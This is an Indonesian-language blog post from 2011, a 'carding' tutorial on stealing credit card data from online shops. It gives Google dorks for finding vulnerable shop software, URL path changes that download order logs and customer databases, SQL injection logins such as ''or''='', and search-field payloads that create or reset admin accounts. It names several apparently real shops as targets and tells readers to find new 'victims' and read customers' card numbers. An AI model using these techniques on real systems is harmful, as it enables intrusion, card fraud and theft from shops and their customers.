pesandarisurga

ZerO-CooL

Tutorial Carding Terlengkap dan Terpercaya.. 9 April 2011

Filed under: Hacking — pesandarisurga @ 15:03

Contoh bugs pada bentuk toko system : shopadmin

Ketik keyword google : allinurl:/shopadmin.asp

Contoh target : http://www.Target.com/shopadmin.asp

user : ‘or’1

pass : ‘or’1

Contoh bugs pada bentuk toko sistem : Index CGI

Ketik keyword google : allinurl:/store/index.cgi/page=

Contoh target : http://www.Target.com/cgi-bin/store/…short_blue.htm

Hapus short_blue.htm dan ganti dengan :./admin/files/order.log

Hasilnya:http://www.Target.com/cgi-bin/store/…iles/order.log

Contoh bugs pada bentuk toko sistem : metacart

Ketik keyword google.com : allinurl:/metacart/

Contoh target : http://www.Target.com/metacart/about.asp

Hapus moreinfo.asp dan ganti dengan : –> /database/metacart.mdb

Hasilnya : /www.Target.com/metacart/database/metacart.mdb

Contoh bugs pada bentuk toko sistem “”CShop

Ketik keyword google.com : allinurl:/DCShop/

Contoh : http://www.Target.com/xxxx/DCShop/xxxx

Hapus /DCShop/xxxx dan ganti dengan

/DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt

Hasilnya : http://www.Target.com/xxxx/DCShop/orders/orders.txt

Contoh bugs pada bentuk toko sistem : EShop

Ketik keyword google.com : allinurl:/eshop/

Contoh : http://www.Target.com/xxxxx/eshop

Hapus /eshop dan ganti dengan : /cg-bin/eshop/database/order.mdb

Hasilnya : http://www.Target.com/…/cg-bin/esh…base/order.mdb

Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk
membaca database access.mdb sebaiknya pake ms access aja)

Contoh bugs pada bentuk toko sistem : PDshopro

Ketik keyword google.com : allinurl:/shop/category.asp/catid=

Contoh : http://www.Target.com/shop/category.asp/catid=xxxxxx

Hapus /shop/category.asp/catid=xxxxxx dang ganti dengan : /admin/dbsetup.asp

Hasilnya : http://www.Target.com/admin/dbsetup.asp

Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb

Download file sdatapdshoppro.mdb dengan merubah url nya menjadi

http://www.Target.com/data/pdshoppro.mdb

Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb
sebaiknya pake ms access aja)

Contoh bugs pada bentuk toko sistem : commerceSQL

Ketik keyword google.com : allinurl:/commercesql/

Contoh : http://www.Target.com/commercesql/xxxxx

Hapus commercesql/xxxxx dan ganti dengan: cgi-bin/commercesql/index.cgi?page=

Hasilnya : http://www.Target.com/cgi-bin/commer…ndex.cgi?page=

Untuk melihat admin config

http://www.Target.com/cgi-bin/commer…/admin_conf.pl

Untuk melihat admin manager

http://www.Target.com/cgi-bin/commer…in/manager.cgi

Untuk melihat file log/CCnya

http://www.Target.com/cgi-bin/commer…iles/order.log

Contoh bugs pada bentuk toko sistem : Cart32 v3.5a

Ketik keyword google.com : allinurl:/cart32.exe/

Contoh : http://www.Target.net/wrburns_s/cgi-…xe/NoItemFound

Ganti NoItemFound dengan : error

Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita
sukses!

Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan
cari bagian Page Setup and Directory Kalau dibagian tersebut terdapat list file
dgn format

/akhiran.c32 berarti di site tsb. terdapat file berisi data cc

Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text
editor lainnya.

Ganti string url tsb. menjadi seperti ini : http://www.
Target.net/wrburns_s/cgi-bin/cart32/

Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi,
dengan format

http://www.Target.com/cart32/

Contoh http://www.Target.net/wrburns_s/cgi-…RNS-001065.c32

Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0

Ketik keyword google.com : allinurl:/vpasp/shopdisplayproducts.asp

Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp

Contoh :

http://Target.com/vpasp/shopdisplayp…39;a%25′–

Gantilah nilai dari string url terakhir dg:

: %20’a%25′–

: %20’b%25′–

: %20’c%25′–

Kalau berhasil, kita akan mendapatkan informasi username dan password admin

Untuk login admin ke http://Target.com/vpasp/shopadmin.asp

silahkan Cari sendiri data CCnya

Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0

Ketik keyword google.com : Ketik –> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut satu per
satu pada bagian search engine :

Keyword=&category=5); insert into tbluser (fldusername) values

(”)–&SubCategory=&hide=&action.x=46&action.y=6

Keyword=&category=5); update tbluser set fldpassword=” where

fldusername=”–&SubCategory=All&action.x=33&action.y=6

Keyword=&category=3); update tbluser set fldaccess=’1′ where

fldusername=”–&SubCategory=All&action.x=33&action.y=6

Jangan lupa untuk mengganti dan nya terserah kamu.

Untuk mengganti password admin, masukkan keyword berikut :

Keyword=&category=5); update tbluser set fldpassword=” where

fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://Target/vpasp/shopadmin.asp

Contoh bugs pada bentuk toko sistem : Lobby.asp

Ketik keyword google.com : allinurl: Lobby.asp

Contoh : http://www.Target.com/mall/lobby.asp

Hapus tulisan mall/lobby.asp dan ganti dengan : fpdb/shop.mdb

Hasilnya : http://www.Target.com/fpdb/shop.mdb

Contoh bugs pada bentuk toko sistem : Shopper.cgi

Ketik keyword google.com : allinurl: /cgi-local/shopper.cgi

Contoh : http://www.Target.com/cgi-local/shop…dd=action&key=

Tambah dengan :…&template=order.log

Hasilnya :

http://www.xxxxxxxx.com/cgi-local/sh…late=order.log

Contoh bugs pada bentuk toko sistem :Proddetail.asp

Ketik keyword google.com : allinurl””roddetail.asp?prod=

Contoh : http://www.Target.org/proddetail.asp…ACSASledRaffle

Hapus tulisan proddtail.asp?prod=SG369

dan ganti dengan –> fpdb/vsproducts.mdb

Hasilnya : http://www.Target.org/fpdb/vsproducts.mdb

Contoh bugs pada bentuk toko sistem “”igishop

Ketik keyword google.com : inurl:”/cart.php?m=”

Contoh : http://Target.com/store/cart.php?m=view.

Hapus tulisan cart.php?m=view

dan ganti dengan –>admin

Hasilnya http://Target.com/store/admin

Trus masukin username sama pass nya pake statment SQL injection

Usename : ‘or”=”

Password : ‘or”=”

setelah bisa login, cari data yang diperlukan .

Contoh bugs pada bentuk toko sistem : Index CGI

Ketik keyword google.com : allinurl:store/index.cgi/page=

Bugs : ../admin/files/order.log

Example : http://www.target.com/cgi-bin/store/…ir_Manuals.htm

masukin bugsnya : http://www.target.com/cgi-bin/store/…iles/order.log

trus copy-paste tuch log’nya di notepad biar gampang di baca

Contoh bugs pada bentuk toko sistem : Index Cart

Ketik keyword google.com : inurl:”/cart.php?m=”

Bugs : Admin

ganti tulisn cart.php?m=view dengan admin

login pake SQl Injection :

username :’or”=”

Passwordnya :’or”=”

contoh target buat kalian :

https://www.therustybucket.biz/store/admin

Contoh bugs pada bentuk toko sistem : Index cart

Ketik keyword google.com : /ashopKart20/”

bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb

example http://www.garrysun.com/ashopkart20/addprod.asp

Injection : selanjutnya masukin bugs di atas jadi : http://www.garrysun.com/ashopkart20/admin/scart.mdb

kalo berhasil loe dapet file beresktension .mdb nach file itu

tmn2 open with MS-Acces

Contoh bugs pada bentuk toko sistem : Catid

Ketik keyword google.com : /shop/category.asp/catid=

Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp

example : http://www.littlesport.net/shop/category.asp?catid=2

masukin bugs menjadi : http://www.littlesport.net//admin/dbsetup.asp

kalo berhasil dapet file.mdb trus buka pake MS – Access tapi kalo gagal berarti

dah keduluan ma carder yang lain… cari target lain ok..??

Contoh bugs pada bentuk toko sistem : Store

Ketik keyword google.com : inurl:”/store/proddetail.asp?prod=”

bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb

Example : http://www.successlink.org/store/pro…prod=SL-IP0001

masukin bugsnya http://www.successlink.org/store/fpdb/vsproducts.mdb

download file .mdbnya trus buka pake MS- ACCESS..

Contoh bugs pada bentuk toko sistem : Sunshop

Ketik keyword google.com : “Powered by SunShop 3.2″

Atau google dork : inurl:”/sunshop/index.php?action=”

Bugs : ganti kata index.php dgn admin

kl ada peringatan java script error klik “OK” aja

Contoh buat kalian : http://www.dohertysgym.com/sunshop/index.php

ganti dengan admin http ://www.dohertysgym.com/sunshop/admin

Login pake SQL Injection :

Username : admin

Password :’or”=’

Contoh bugs pada bentuk toko sistem : digishop

Ketik keyword google.com

Ketik keyword google.com : “Powered by Digishop 3.2″

Bugs : hapus tulisan cart.php?m= dengan admin

Login pake SQL Injection :

Username : ‘or”=”

Password : ‘or”=”

Contoh target :

http://uniquescrapbooks.com.au/store/admin

http://www.7footserb.com/shop/admin

https://www.tangerineclothing.com/admin

Contoh bugs pada bentuk toko sistem :Lobby

Ketik keyword google.com : inurl:”mall/lobby.asp”

bugs : ganti tulisan /mall/lobby.asp dengan fpdb/shop.mdb

example : Gem Depot Lobby Page – Search our Inventory

jadi http://www.gemdepot.com/fpdb/shop.mdb

dapat dech .mdb ===> trus klik open database JANGAN klik “convert databese”
===> klk view orders ====> trus cari orang yg pernah belanja contoh pada
customer no 36 trus dimana no CCnya badKiddes….

sabar bro… masih di table customer no 36 then klik payment

*yang ini udah di patch jadi udah ngga bisa lg silakan cari lagi korban lainnya

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s